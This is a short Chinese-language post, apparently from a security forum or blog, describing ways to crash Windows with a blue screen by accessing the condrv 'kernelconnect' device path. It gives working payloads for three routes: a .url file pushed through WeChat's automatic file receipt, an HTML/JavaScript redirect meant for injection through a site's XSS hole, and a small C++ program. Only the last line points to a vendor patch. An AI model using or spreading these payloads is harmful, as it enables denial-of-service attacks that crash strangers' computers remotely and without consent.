windows蓝屏的一些利用方式

核心代码：

file:///globalroot/device/condrv/kernelconnect

利用方式如下：

1.微信自动接收文件，落地蓝屏：

该文件为url格式，只要接触就会触发访问

2.利用JavaScript的进行攻击，一旦网站有XSS漏洞，可以使用此漏洞来完成蓝屏

<html>
<head>
</head>
<body>>
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
</body>
</html>

3.exe

// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
 
#include <iostream>
#include <Windows.h>
 
int main()
{
    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";
    WIN32_FILE_ATTRIBUTE_DATA data;
    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);
}

目前火绒存在安全补丁：

https://down5.huorong.cn/tools/HRCondrvVulFix.exe